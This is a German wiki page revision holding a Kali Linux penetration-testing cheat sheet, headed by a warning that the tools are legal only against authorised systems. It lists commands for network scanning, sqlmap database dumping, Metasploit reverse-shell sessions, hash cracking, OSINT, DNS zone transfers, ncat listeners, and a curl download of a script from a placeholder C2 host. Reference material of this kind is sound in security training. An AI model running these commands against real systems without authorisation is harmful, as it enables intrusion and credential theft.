Kali 2026 Cyber Security - Sheet Cheat: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „= Kali Linux 2026 – Cheat Sheet = Übersicht der wichtigsten Kommandos für Ethical Hacking und Penetration Testing, gruppiert nach Phasen. {{Hinweis|Alle…“) |
|||
| Zeile 3: | Zeile 3: | ||
Übersicht der wichtigsten Kommandos für Ethical Hacking und Penetration Testing, gruppiert nach Phasen. | Übersicht der wichtigsten Kommandos für Ethical Hacking und Penetration Testing, gruppiert nach Phasen. | ||
| − | + | *Alle hier gelisteten Werkzeuge dürfen ausschließlich gegen Systeme eingesetzt werden, für die eine schriftliche Beauftragung bzw. ausdrückliche Erlaubnis vorliegt. | |
| + | *Einsatz gegen fremde Systeme ist nach § 202a–c StGB strafbar | ||
== Network & Discovery == | == Network & Discovery == | ||
Aktuelle Version vom 14. Juni 2026, 19:18 Uhr
Kali Linux 2026 – Cheat Sheet
Übersicht der wichtigsten Kommandos für Ethical Hacking und Penetration Testing, gruppiert nach Phasen.
- Alle hier gelisteten Werkzeuge dürfen ausschließlich gegen Systeme eingesetzt werden, für die eine schriftliche Beauftragung bzw. ausdrückliche Erlaubnis vorliegt.
- Einsatz gegen fremde Systeme ist nach § 202a–c StGB strafbar
Network & Discovery
nmap
- TCP-SYN-Scan (Stealth, halb offen)
nmap -sS <ziel>
- Dienst- und Versionserkennung
nmap -sV <ziel>
- Standard-NSE-Skripte ausführen
nmap -sC <ziel>
- Aggressiver Scan (OS, Version, Skripte, Traceroute)
nmap -A <ziel>
- Betriebssystem erkennen
nmap -O <ziel>
- Alle 65535 TCP-Ports scannen
nmap -p- <ziel>
- Schnelleres Timing
nmap -T4 <ziel>
- Ausgabe im Normalformat speichern
nmap -oN scan.txt <ziel>
masscan
- Port 80 im lokalen Subnetz scannen
masscan 192.168.1.0/24 -p80
- SSH- und Web-Ports scannen
masscan 192.168.1.0/24 -p22,80,443
- Voller TCP-Scan mit begrenzter Rate
masscan 192.168.1.0/24 -p1-65535 --rate 1000
- Test-Host auf Web-Dienste prüfen
masscan scanme.nmap.org -p80,443
- RDP in internen Bereichen suchen
masscan 10.0.0.0/8 -p3389 --rate 500
- Banner von SMB-Zielen abgreifen
masscan 10.0.0.0/8 -p445 --banners
- Gängige Dienst-Ports prüfen
masscan 172.16.0.0/16 -p21,22,80,443
Web Security & Auditing
nikto
- Host scannen
nikto -h http://ziel.com
- Bestimmten Port scannen
nikto -h http://ziel.com:8080
- HTTPS-Scan erzwingen
nikto -h https://ziel.com -ssl
- Interessante Dateien testen
nikto -h ziel.com -Tuning 1
- Fehlkonfigurationen / Default-Dateien
nikto -h ziel.com -Tuning 2
- Injection-Tests
nikto -h ziel.com -Tuning 4
- Ziele aus Eingabedatei scannen
nikto -h hosts.txt
sqlmap
- Automatischer (nicht-interaktiver) Test
sqlmap -u "https://url.com/i.php?id=1" --batch
- Verfügbare Datenbanken auflisten
sqlmap -u "https://url.com/i.php?id=1" --dbs
- Tabellen einer DB auflisten
sqlmap -u "https://url.com/i.php?id=1" -D shop --tables
- Tabelleninhalt extrahieren
sqlmap -u "https://url.com/i.php?id=1" -D shop -T users --dump
- Zufälligen User-Agent verwenden
sqlmap -u "https://url.com/i.php?id=1" --random-agent
- Gespeicherten Request (z.B. aus Burp) verwenden
sqlmap -r request.txt
Vulnerability & Exploitation
Metasploit
- Metasploit-Konsole starten
msfconsole
- Module nach Stichwort suchen
search <stichwort>
- Modul auswählen
use <modul>
- Optionen des Moduls anzeigen
show options
- Ziel setzen
set RHOSTS <ziel>
- Eigene IP (für Reverse Shell) setzen
set LHOST <ip>
- Modul ausführen
run/exploit
- In Session wechseln
sessions -i <id>
- Aktuelle Session in den Hintergrund
background
Web Fuzzing (wfuzz)
- Verzeichnisse finden
wfuzz -w wordlist.txt http://ziel/FUZZ
- Parameter finden
wfuzz -c -w wordlist.txt "http://ziel/?FUZZ=1"
- Subdomains finden
wfuzz -c -w subs.txt -H "Host: FUZZ.ziel.com" http://ziel
Credential Auditing & Passwords
hashcat
- Wörterbuchangriff (MD5)
hashcat -m 0 -a 0 hashes.txt rockyou.txt
- Wörterbuchangriff (SHA1)
hashcat -m 100 -a 0 hashes.txt rockyou.txt
- Wörterbuchangriff (NTLM)
hashcat -m 1000 -a 0 hashes.txt rockyou.txt
- sha512crypt ($6$)
hashcat -m 1800 -a 0 hashes.txt rockyou.txt
- Brute-Force-Maskenangriff
hashcat -m 0 -a 3 hashes.txt ?d?d?d?d?d?d
- Hybrid
- Wörterbuch + Maske
hashcat -m 0 -a 6 hashes.txt rockyou.txt ?d?d?d
- Regelbasierter Angriff
hashcat -m 0 -a 0 -r rules/best64.rule hashes.txt rockyou.txt
- Gespeicherte Session fortsetzen
hashcat --restore
John the Ripper
- Unterstützte Hash-Formate auflisten
john --list=formats
- Wörterbuchangriff
john --wordlist=rockyou.txt hashes.txt
- Mangling-Regeln anwenden
john --rules --wordlist=words.txt hashes.txt
- Inkrementeller Brute-Force
john --incremental hashes.txt
- Single-Crack-Modus
john --single hashes.txt
- Hash aus SSH-Schlüssel extrahieren
ssh2john id_rsa > id_rsa.hash
- Geknackte Passwörter anzeigen
john --show hashes.txt
OSINT & Information Gathering
sherlock
- Benutzernamen auf vielen Plattformen suchen
sherlock benutzer
- Mehrere Benutzernamen prüfen
sherlock benutzer1 benutzer2
- Auf bestimmte Seite einschränken
sherlock benutzer --site Twitter
- Timeout pro Seite setzen
sherlock benutzer --timeout 5
- Ergebnisse speichern
sherlock benutzer --output ergebnis.txt
- Gefundene Profile im Browser öffnen
sherlock benutzer --browse
WHOIS & DNS
- Domain-Details abfragen
whois ziel.com
- IP zu Domain ermitteln
host ziel.com
- Zonentransfer versuchen
dig ziel.com AXFR @ns1.ziel.com
Post-Exploitation & Networking Tools
ncat
- TCP-Verbindung zu Port 80
ncat 192.168.1.10 80
- UDP-Verbindung zu Port 53
ncat -u 192.168.1.10 53
- Auf eingehende Verbindungen lauschen (mehrfach)
ncat -l -k 4444
- Verbindung mit ausführlicher Ausgabe
ncat -v 192.168.1.10 22
- Portscan 20–25
ncat -zv 192.168.1.10 20-25
- Empfangene Daten in Datei schreiben
ncat -l 4444 > datei.txt
- Verbindungs-Timeout 10 Sekunden
ncat -w 10 192.168.1.10 443
Data Transfer & C2
- Datei herunterladen
curl -O http://c2.com/file.sh
- Lokalen HTTP-Server starten
python3 -m http.server
- Datei sicher kopieren
scp file.txt user@ziel:/pfad